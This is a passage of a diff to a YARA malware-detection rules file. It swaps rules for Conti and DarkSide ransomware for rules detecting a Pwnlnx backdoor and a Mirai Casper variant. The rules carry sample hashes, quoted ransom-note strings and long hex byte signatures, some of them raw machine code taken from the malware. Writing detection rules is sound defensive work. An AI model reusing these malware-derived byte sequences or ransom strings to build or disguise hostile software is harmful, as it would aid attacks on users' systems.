????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??74??8B??????39??????73??8D??????68????????50FF??85??74??83????8B??68????????E8????????83????8D????????????8B??51E8????????E8????????83????85??75??8B??????39??????73??8D??????83????8B??51E8????????E8????????83????6A??33??8D??????E8????????8D????????????50FF??????FF??????????85??0F85????????FF??????FF??????????33??435333??8D?????? }
+		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000????????????000000000000??????0000000040??????????????000014??000003??0000474E55????9FECFBE5??F973??EB??2A??????????71??BD????????0000000000000000554889??53E8????????FF????????????4889??4889??4881??????????FF????????????4889??5BC9C30F1F??????554889??E8????????FF????????????C9C366666666????????????????????554889??E8????????4885??74??4C8B????4D85??74??65??8B????????????8B??????????4889??????????48C7??????????89??C1????C1????01??25????????29??48984C89????????????FF??????????C9C3660F1F????????????31??C9C36666662E????????????????554889??E8????????4889??????????48C7??????????FF??????????C9C390554889??E8????????8B??????????488B??????????488D????0FB6????3C??400F94??3C??410F94??74??4084??75??B8????????C9C30F1F????????????8B??????????39????74??3B????74??4584??74??8B??????????4801??0FB7??????????66????74??66??????75??4889??41FF??B8????????C9C30F1F??4084??74??8B??????????4801??0FB7??????????66????75??EB??0F1F????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??BE????????E8????????483D????????77??4885??74??488B????4889????31??4889??E8????????31??4883????5BC9C383????EB??660F1F??????554889??415453E8????????4989??4889??BE????????31??E8????????483D????????77??488B????31??4889??488B????4989????488B????4889????E8????????31??5B415CC9C383????EB??554889??4157415641554154534883????E8????????4889??488D????4989??4189??4889??BA????????4989??4489????4D89??E8????????488B??????????448B????4881??????????488D????75??EB??0F1F????488B????4881??????????488D????74??0FB7????4839??75??4883????31??5B415C415D415E415FC9C30F1F??????4D89??4C89??4489??4889??4C89??FF??????????4883????5B415C415D415E415FC9C30F1F????554889??4157415641554154534883????E8????????65??8B????????????4889????4889????4189??8B??????????4889??B9????????48C7??????????4889??4D89??4589??89??C1????C1????01??25????????29??F3A648984C8B????????????0F84????????B9????????48C7??????????4889??F3A60F84????????31??4585??4889??4889????4489????74??418D??????31??488D??????0FB6??4883????4889??48C1????48C1????4801??4801??4839??488D????488D????75??89????488D????4C89??E8????????4885??4889??0F84????????488B????4885??74??81????????????0F84????????488B??????????483D????????4C8D????75??EB??0F1F??????498B????483D????????4C8D????74??498B??4889??E8????????85??75??31??4883????5B415C415D415E415FC9C34589??4D89??488B????4489??4889??488B????FF??????????4883????5B415C415D415E415FC9C30F1F??????????81????????????0F85????????31??EB??488D????4C89??E8????????4885??4889??74??498B????488B??????????488B????4885??74??31??4889??4889????FF??4885??488B????0F84????????31??E9????????0F1F????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??41554154534883????E8????????4C8B??????????4989??4981??????????498D??????75??EB??0F1F????4C8B????4981??????????498D??????74??488B??4C89??E8????????85??75??4C89??E8????????488B??E8????????4889??E8????????4883????5B415C415DC9C36666662E????????????????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $pattern
+		uint16( 0 ) == 0x457f and filesize < 400KB and all of them
 }
-
-rule TRELLIX_ARC_Ransom_Conti : RANSOMWARE FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_6 : BACKDOOR FILE
 {
 	meta:
-		description = "Conti ransomware is havnig capability too scan and encrypt oover the network"
-		author = "McAfee ATR team"
-		id = "8fc6943d-fb99-5957-929b-4c264d9fba2d"
-		date = "2020-07-09"
-		modified = "2020-10-12"
-		reference = "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Conti.yar#L3-L37"
+		description = "Rule to detect the backdoor pwnlnx variant 6"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "56bfe9c7-4cd4-51f6-a469-da8af52d64c2"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L131-L161"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe"
-		logic_hash = "953471c130309bbc712197d49d2072bd45838f49d2b25f86273a15c6baa87354"
+		hash = "d29254ab907c9ef54349de3ec0dd8b22b4692c58ed7a7b340afbc6e44363f96a"
+		logic_hash = "29423135a46ee7b9aa1bd8f1e6f7ffad09725787ad6e75312e1d34b18e3917d4"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Conti"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$string1 = "HOW_TO_DECRYPTP" fullword ascii
-		$string2 = "The system is LOCKED." fullword ascii
-		$string3 = "The network is LOCKED." fullword ascii
-		$code1 = { ff b4 b5 48 ff ff ff 53 ff 15 bc b0 41 00 85 c0 }
-		$code2 = { 6a 02 6a 00 6a ff 68 ec fd ff ff ff 76 0c ff 15 }
-		$code3 = { 56 8d 85 38 ff ff ff 50 ff d7 85 c0 0f 84 f2 01 }
+		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000??????09??00000000000000004000000000??????2B??28??04??000014??000003??0000474E55????4D9585????AB6522????52AD3B??EC9B4BE8????????0000000000000000????00000000554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??41574589??415641554189??4154534889??4883????488B??????????4889????4889????4C89????483D????????4C8D????74??4C63??EB??0F1F??????498B????483D????????4C8D????74??498B??4C89??4889??E8????????85??75??4883????5B415C415D415E415F5DC30F1F??????????4589??4C8B????488B????4489??4889??488B????FF??????????4883????5B415C415D415E415F5DC3660F1F??????E8????????554889??41574589??41564D89??41554989??41544189??BA????????534889??488D????4883????4889????4889??65??8B????????????4889????31??E8????????488B??????????4881??????????488D????74??0FB7????4839??75??EB??0F1F????????????410FB7????4839??74??4C8B????4981??????????498D????75??4589??4D89??4C89??4489??4889??488B????FF??????????488B????65??33????????????75??4883????5B415C415D415E415F5DC3660F1F??????31??EB??E8????????0F1F??????662E0F1F????????????E8????????55BF????????4889??4881??????????65??8B????????????4889????31??488D??????????FF????????????B9????????4889??488D??????????F3??A5488D??????????48C7??????????BE????????B1??E8????????4885??74??48BA???????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.number_of_sections == 5 and ( pe.imphash ( ) == "30fe3f044289487cddc09bfb16ee1fde" or ( all of them and all of ( $code* ) ) )
+		uint16( 0 ) == 0x457f and filesize < 700KB and all of them
 }
-rule TRELLIX_ARC_RANSOM_Darkside : RANSOMWARE FILE
+rule TRELLIX_ARC_Mirai_Casper_Variant : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect packed and unpacked samples of DarkSide"
+		description = "Rule to detect the Mirai Casper variant"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "ecbee92f-236a-5385-9566-502ef1c0aeda"
-		date = "2020-08-11"
-		modified = "2023-07-27"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Darkside.yar#L1-L23"
+		id = "0f3a028c-9514-51cd-ad82-415e8ac2dee7"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L163-L193"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "be16d65911336809be103ea667167228e6445de85fd47ecd9ff8b3d91e056693"
+		hash = "57cc422a6a90c571198a2d1c3db13c31fbdb48ba2f0f4356846d6d636d0f9300"
+		logic_hash = "5449d1ef0c4977c6151fc194ad5f526b6be414c1efb7fd4bacb77d4bcd89c703"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/DarkSide"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297"
 
 	strings:
-		$pattern_0 = { CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558BEC5053515256570FEFC0660FEFC033DB8B7D088B450C33D2B910000000F7F185C0740B0F110783C7104885C075F585D27502EB5892B908000000F7F185C0740B0F7F0783C7084885C075F585D27502EB3B92B904000000F7F185C0740A891F83C7044885C075F685D27502EB1F92B902000000F7F185C0740B66891F83C7024885C075F585D27502EB02881F5F5E5A595B585DC20800558BEC5053515256578B750C8B7D088B451033D2B910000000F7F185C074110F10060F110783C61083C7104885C075EF85D27502EB6892B908000000F7F185C074110F6F060F7F0783C60883C7084885C075EF85D27502EB4592B904000000F7F185C0740F8B1E891F83C60483C7044885C075F185D27502EB2492B902000000F7F185C0740E66891F83C60283C7024885C075F285D27502EB048A1E881F5F5E5A595B585DC20C00558BEC53515256578B4D0C8B75088B7D1033C033DBAC8AD8C0E80480E30F3C0072063C09770204303C0A72063C0F7702045780FB00720880FB09770380C33080FB0A720880FB0F770380C35766AB8AC366AB4985C975BE6633C066AB5F5E5A595B5DC20C00558BEC53515256578B75088B7D0C55FCB2808A0683C601880783C701BB0200000002D275058A164612D273E602D275058A164612D2734F33C002D275058A164612D20F83DB00000002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C074068BDF2BD88A03880747BB02000000EB9BB80100000002D275058A164612D213C002D275058A164612D272EA2BC3BB010000007528B90100000002D275058A164612D213C902D275058A164612D272EA568BF72BF5F3A45EE94FFFFFFF48C1E0088A06468BE8B90100000002D275058A164612D213C902D275058A164612D272EA3D007D000083D9FF3D0005000083D9FF3D8000000083D1003D8000000083D100568BF72BF0F3A45EE9FEFEFFFF8A064633C9C0E801741783D1028BE8568BF72BF0F3A45EBB01000000E9DDFEFFFF5D2B7D0C8BC75F5E5A595B5DC20800558BEC53515256578B7D088B450CB9FF00000033D2F7F185C074188BD868FF00000057E8AD00000081C7FF0000004B85DB75EA85D274075257E8970000005F5E5A595B5DC20800558BEC5351525657B9F0000000BEB2B640008B45088B108B58048B78088B400C89540E0C89440E08895C0E04893C0E81EA101010102D1010101081EB1010101081EF1010101083E91079D533D233C98B750C33DB8B7D108A81B2B6400002141E02D08AA2B2B64000438882B2B6400088A1B2B640003BDF7306FEC175DAEB0633DBFEC175D25F5E5A595B5DC20C00558BEC535152565733C0A3C2B84000A3C6B84000B9400000008D35B2B640008D3DB2B74000F3A58B7D088B15C2B840008B4D0C8B1DC6B840004F33C0029AB3B740008A82B3B740008AABB2B740008883B2B7400088AAB3B7400002C5478A80B2B74000FEC23007FEC975D18915C2B84000891DC6B840005F5E5A595B5DC2080053515256578D35047040008D3DCAB84000FF76FC56E891FEFFFF56E8864500008BD8FF76FC56E888FBFFFF8B46FC8D3406B915000000E85C010000AD5056E868FEFFFF56E85D4500008BD8FF76FC56E85FFBFFFF8B46FC8D3406B93D000000E833010000AD5056E83FFEFFFF5256E8334500008BD85AFF76FC56E834FBFFFF8B46FC8D3406B915000000E808010000AD5056E814FEFFFF5256E8084500008BD85AFF76FC56E809FBFFFF8B46FC8D3406B904000000E8DD000000AD5056E8E9FDFFFF5256E8DD4400008BD85AFF76FC56E8DEFAFFFF8B46FC8D3406B906000000E8B2000000AD5056E8BEFDFFFF5256E8B24400008BD85AFF76FC56E8B3FAFFFF8B46FC8D3406B901000000E887000000AD5056E893FDFFFF5256E8874400008BD85AFF76FC56E888FAFFFF8B46FC8D3406B903000000E85C000000AD5056E868FDFFFF5256E85C4400008BD85AFF76FC56E85DFAFFFF8B46FC8D3406B901000000E831000000AD5056E83DFDFFFF5256E8314400008BD85AFF76FC56E832FAFFFF8B46FC8D3406B902000000E8060000005F5E5A595BC3ADFF76FC56E80AFDFFFF515653E8F743000059ABFF76FC56E8FFF9FFFF8B46FC8D34064985C975D8C3558BEC81EC1401000053515256578D85ECFEFFFF50FF1516B940008BB5F0FEFFFF8BBDF4FEFFFF83FE05750583FF01720583FE057313B8000000005F5E5A595B8BE55DC3E9DA00000083FE05751883FF017513B8330000005F5E5A595B8BE55DC3E9BD00000083FE05751883FF027513B8340000005F5E5A595B8BE55DC3E9A000000083FE06751785FF7513B83C0000005F5E5A595B8BE55DC3E98400000083FE06751583FF017510B83D0000005F5E5A595B8BE55DC3EB6A83FE06751583FF027510B83E0000005F5E5A595B8BE55DC3EB5083FE06751583FF037510B83F0000005F5E5A595B8BE55DC3EB3683FE0A751485FF7510B8640000005F5E5A595B8BE55DC3EB1D83FE0A750583FF00770583FE0A760EB8FFFFFF7F5F5E5A595B8BE55DC3B8FFFFFFFF5F5E5A595B8BE55DC3558BEC83C4F853515256576A0068800000006A026A006A006800000040FF7508FF1526B940008945FC837DFCFF74226A008D45F850FF7510FF750CFF75FCFF1536B9400085C07409FF75FCFF153EB940005F5E5A595B8BE55DC20C008BFF558BEC5351525657837D0C0074728D3DAABA4000837D100075086A1057E842F8FFFFFF750CFF750868EFBEADDEFF15F6B84000FF750CFF750850FF15F6B840003107FF750CFF750850FF15F6B84000314704FF750CFF750850FF15F6B84000314708FF750CFF750850FF15F6B8400031470CB8AABA40005F5E5A595B5DC20C00B8000000005F5E5A595B5DC20C00558BEC5351525657FF7508FF15DEB8400083C4048BD88D045D02000000506A00FF35AEB64000FF15BEB940008BF085F67434FF750856FF15CEB8400083C4088D43016A006A0050FF75086AFF566A006A00FF1506BA4000566A00FF35AEB64000FF15C6B940008BC35F5E5A595B5DC2040053515657833DBABA400000750B68BABA4000FF15F2B8400068BABA4000FF15F2B840008BD15F5E595BC3558BEC5351525657BB080000008B7508E8C1FFFFFF83FB05750433C033D28944DEFC8954DEF84B85DB75E55F5E5A595B5DC204008D4000558BEC81EC0001000053515256578D45B083C00F83E0F089850CFFFFFF8D8560FFFFFF83C00F83E0F0898508FFFFFF8D8510FFFFFF83C00F83E0F0898504FFFFFF837D14000F84750300008BB504FFFFFF0F57C00F11060F1146100F1146200F1146308B75088BBD0CFFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F30837D1440732A8B4510898500FFFFFF8B9504FFFFFF8BFA8B750C8B4D148A440EFF88440FFF4985C975F389550C8955108BB50CFFFFFF8BBD08FFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F305556BD0A0000008B078B5F108B4F208B57308BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C68907895F10894F208957308B47148B5F248B4F348B57048BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894714895F24894F348957048B47288B5F388B4F088B57188BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894728895F38894F088957188B473C8B5F0C8B4F1C8B572C8BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C689473C }
-		$pattern_1 = { 70211F3B6E97C50000473D000000A000004602003EBBFF1F92CC558BEC5053515256570FEFC0660333DBFBFFEDFF8B7D088B450C33D2B9100000F7F185C0740B0F110783C710480A692EFB7F75F585D27502EB5892B9081C7F08B60F592E3B040A891F38049B641979F61F02661CD6FEBFEC023802881F5F5E5A595B585DC25D977E20634F8B750C9110110F1006252383FD94C61097EF6819AC59BA226F7F089DEFD8EE0119450F8B1E82C604A23E033232F1240EC602B9EC91C1A5F2048A1EA70CA12CCBD9A64D757D42E9FEFFBFAC8AD8C0E80480E30F3C0072063C09770204303C0A090FB66F6DBB5780FB140804150380C3300C0ADADFFE790F5766AB8AC3034985C975BE6646FF252CD6096564610C55FCB2806FDF86DB8A069701887801BBAD0299058A164FD62EFB4612D273E60A4F430C0F83DB7F2A7B602613C00A74068BDF2BD821EC63DB8A03644762EB9BB80142900BFBFB72EA2BC3BB1C7528B923C96F7FFB1F568BF72BF5F3A45EE94D01D248C1E008C3468BE8DE1EC26E0C0449303D007D4B83D9FF0DD93CD907058000D100BDB01BF250F04C33C974017417B1D8B0B61902561B96204B06E1C25D2B398BC75208111AEE18EDB9FF2660F4F8EFDDF7188BD8680E579B03D981C70B4B85DB75EAEE94CD5EFE7407521546B9F0256F7F6BB7BE02A6B24D50108B58048B7807400C895FF7FFDB540E03440E08895C0E04893C0E81EA10002D048168ED9FB1EB05EF83E91079D57EC0DFFFFDE4EC80108A814A02141E02D08AA20A436BFFBFDF88820688A1053BDF7306FEC175DAEB062C076E0B29A3D227F8A327A8C27DFBEDFE04C6B940998D35378D3D05A7B2F3A57DBC8FF7F31520B41D242A9A1BFB8DDD1CB38A8205AB28888305AA11D88DFFFE02C5478A800EFEC23007FEA0D189402F9684D8893D0D7C6BF07BF8CF6004A8CAFF76FC5630040549FF33FFDBAC59109C0C8B46FC8D3406B9150F477291BD05F0AD50283D52C252D961295A532A02B902BB04550608B902B90103E10843260299C3AD8615B2BF2751565333F959AB329FE0EEF874D8C33F81EC1468C885ECFE7777DFF0FFFF50FF4FA9168BB5F00C8BBDF40583FE055877F74BA483FF017205097313B86D00695BF36DFA8BE55DC36C073C2118751C3300D21C210234DF04D2FD06751785FF1B3C1555109AC11EC8B83DEB6A19023EA419644250033FC866DE2636690A75141864FECDEE4C1DDE00770A760EB8FFFFFF7F1B927C490DFF3083C4AEFD7A84F82D6A0068976A02080AFE8FB07509405A083B268945FC837DFCFF7422916D73DF188D45F85072020C1DFC34ECB0AE3672090C3E59746B43DACC8BFFCE3C0D7472E1AD44FB51AAAA0B04576A1057BC67BF3F16470868EFBEADDE3FA8F6105090BDB0670C31070E47040F92F50EC9080CB8624E071B5913D85CD6A8DE6D1FDF6AF9E4D88D045D6D50DAFF58F78F7D63AEC6BE8BF085F6743429562ADDDCE1CBCE088D430119FDBDFF56B027ECEF0A1AAA065639C68BC37077FB9C630484FAF4BAF10B6807A31DB0B14CF20A8BD12DE09A3871989ABBFD24E84013CB376608A783FB048DD2D90317B87FDEFC87DEF8C4E55D49C628308D17EE000DC32FF145B083C027E0F089850CE3FD202387B960051108102B99FE37040B7D14000F8475C41E0FA6DBC5F60F571C119846100320ED17EF8930B1BD4EB0104E17D32CDBCB1056105E3026074F57CDE6E26E5F304840732AE457008B6FF017BF954D8BFAFB4D148A3FFF88447B6DFBD30FFFA3F389550C02106E5359FDF0A964085556BD0A14078B5F6FFFDFBE354F208B5792F003F2C1C60733DE8BF303F0080933CEED2FFFF28BF103F30D33D68BF203F11233C68907892ECBB26D96898947143A243404CBD612202F3B24342CCBB22C0428380818CBB25C802838081820CBB22C3C0C1C2CDFB22C173C0C1C2CED0463476063760CED04750C53606363ED187510ED18D80863637510ED2C6424ED3036C2142C6524ED30234C818D6538ED3065386DA30DFC4D85ED0F851B975E5DF30702CBE5726BC80357105F1867206FB6022F972877307F380F0C024EE572B9DC1EFE56FE5EFE66FE6EA6D996CBFE76FE7E7F3D7F7F94A6699A7F7F7F7F7F9AE5C8708D6B5757575D8C966B57BED8FE2011BFE4B834118B9DA7274320837B2086F1B195000824E977EF1866C335DB32C500E4B2BD154E8B55BA338942200524B5655BFA24EB16831940030C6D370297C0237485CAFC86C21297EE1A818880308D7D80F3B920B16FE21DF2F3ABB900DF518D7580F810CD33E7FED1168D7604E2F92175128B06194DA6ECED078D7F17F473181911C9600933C441290CD5BB0A5B5B59F033E476B05505E00CEDAA9BBDB266E03AA5D908A6BFB960DDDFFCDD4FE0C64580018BA98F7EF05D0C81C379B981A849B1BE07D84150F8510851FC8DAB8360115F547B8D626FADBB1D508D3B50E874D3815240D3E0BF6563F02203740F9908199BBB4B1961646306AE9B780C830627307DC7E63041B73BDB06F8410ECB8A369391B8D51A68A41F000B8278E2C406CE1F0926023676729008AA12F80C1A24446B4B22170E54206317F226F8C37EF45B18B8C3F8EF238B71C65E4E62F475F8F46A0514066C737F01CE04EB43EB3F3D310A1B1CB5D84CD837C2EBC60D2C5A839117A1C12C4468F7BBA5196AD2C86AD6616CDBD8288E2E33ED3CAD1D14C3999178FF733C02CA74D72E71A1A14402EBFC1C332275D4565858CA5D4F846D35570F06E6AC62895FE9BF454B183B480875278D1F30AABEC220586C3BEA0F2C3A0E186BD5E850C63826070017E40793C5F30C0262CC0D776B110D6F68081017F4FDDD58B2C77568040110976256A3D8B3C4B2CC11D3D23DE2DB4636F677FC57FB571F34102048BC03A1088DA3ADD5456CD8C2BE227A30C3A3B18D922A9B1C2C6A9BDB095B62106E38E18B5E12C37BD86CB0403753132F6E56A573B367B10FBC59A8EE97CD409E848530675464A1183064849F924030C31A2C72E1248313F88D1DCF6C125B166CECFC53EC531BB519E4027936286BC0D263936C0F6A245FD4C70B24B15766738C09E89B4A2C585392A89C53325426816407AA7E5111040C8D9913E810EF52A937B527344930AA660C5E017648727CC960E3F07304ADA50B27ACDB8F2D60F0B5833EAF15107A641F05D019EBCCCBACDD2578763D4FA9744A4A0FFC0618E9E3147A6517C1293AECB517D9F88B122E0146336C2CD67D7C5224760B1D0E08506FC8096E7ACA96504FB6B1B1463FD3A6521911F424E1FC5A0142A91AD9A722EC3EEE6B18B26B1C3D7DB1D75EAFFC8D7531831C8535BF8E68EB803FAA5219367958D984534FBE3C1B690664B0B03CCC09209966A401B44050C83336C9ECA29D0004D88465B109215A244576CF58C96AF0346AF4AE9D3DB360BC0E3989C005A9247508F153A7A564036F644553F675A3D4253BAC3956120C5AEBE66EC682D922722568F4C058B36FD730DAEDB57D14450DAA0BD716168151969EAE69921D76C8D85E08626E130C9C11C00D07C160C7846481EDFF72C8A1BDE3DF9F813C18DEADBEEF980340EBF2C631F9EC4E04136DA456A4A1FC8EAC7E73C8C1E0068BD82373CCBB46C6DE01B16A1630408086A44CB2810B2C2F3616500A17F3DE5F0BAB8EAEA556561FFBE5B2F6150A374D358D83E6070A67B303593A5A56223D5A89E4C8254EB60FE492B3D95E56223D5E4FD9EC447286176256223D223972C96250561FB9E46C766656223D6641363B911C26276A56223D488E5C726A51F62E72362B90C7223D6E9D488E5C52C6367256472E399B223D724B963E9CCD4E247656223D7627922397537E427A56964BCE66223D7A545890672269727E72CCA759E47E0AC8A912678203C11A01B23557FBC2E08A53D968243106BE91ACB86472A8C319698152773D833C038C907C420BB3345B061008091C095EE251887010EBDE251B5A160CE0FD66B80904A10B9566ABE74C161266A4D19EE614ECA72DE3F8DC0F84A129461DF421D89E3DE828139F83DA062D4FEEF350ECD3AEFCF6EB6399F833D285D255B390DB6BFDC90530940107A842EB14BB162E2CC12B8B1BD4CB4D33C9192BFFAE400830040E4183F9080E04AC5F713904576A57014C7042E2C8681122C63664F381D8ED9E70B470B8182C883DA58E0EFFE62C080B5B180C256C469348D2C1B408AC1CEC840704300A44AA0EBBB6044381DC0C4BA62EEA1D487CDA4AE10E58D4DC194871F43A5F5DB37064FBF086F034798B83C9A26B096057B0571E7F83172666FD47FE5CFA66C704475C00D565F15702444702D9EB3D62598B151A11EA0B3531B614F06592BA0E46348A5D3932DAC81B1A386C90410C03802C26E0B1CCCD19502B1B035C4379AA3ACD09D534968523BBEB6953CCECBFEC511DB68B27C8F4CB75EC39326FD94ED2820BEB1E27F41821E12E7548293B02750759AC12C23B9616FF57C6082997A5EC1C846C4EC80C6D026D0630968DE46D06251CA43358A41AF84F9CD06CEBA91B5C107EDA562CE1F7C049A5AE83702B0CCB523367A364CD46000B08DD35AD8C91877A08E63C5798CC25C3AC9C86AD927DC615A3A3DC53E7CA217946B6431A1010E864489E911414F0183891906718F8A44D6148561EEBA0D3363ACC9DD08BC8C45110BA36D092BA42CE140510960626A37C49D0736C658C67F0524156E89E609103 }
+		$bp = { 7F??4C4601??01??000000000000000002??03??01??0000E0??04??34??000088??????????000034??20??05????????????????000000000000000080??????80??????15????????0C??05????????10??????0000??????0C??40A510??40A510??80??????904A0000060000000010????????0000D4??0000D4??04??D4??04??440000??????????????000004??0000070000??????0C??40A510??40A510??14??000030??000004??000004??000051E5??64????000000000000000000000000000000000000060000??????000004??000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55??????3A??87????529723????2C??08??????AB35????????2A??0000BC????????0000????A510??2A??0000C4??????????0000C8??????2A??0000CCA510??2A??00005589??5383????E8????????5B81??????????8B??????????85??74??E8????????E8????????E8????????585BC9C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????000000000000000031??5E89??83????50545268????????68????????515668????????E8????????F490909090909090909090909090905589??538D??????80????????????75??BB????????A1????????81??????????C1????83????39??73??908D??????83????A3????????FF????????????A1????????39??72??B8????????85?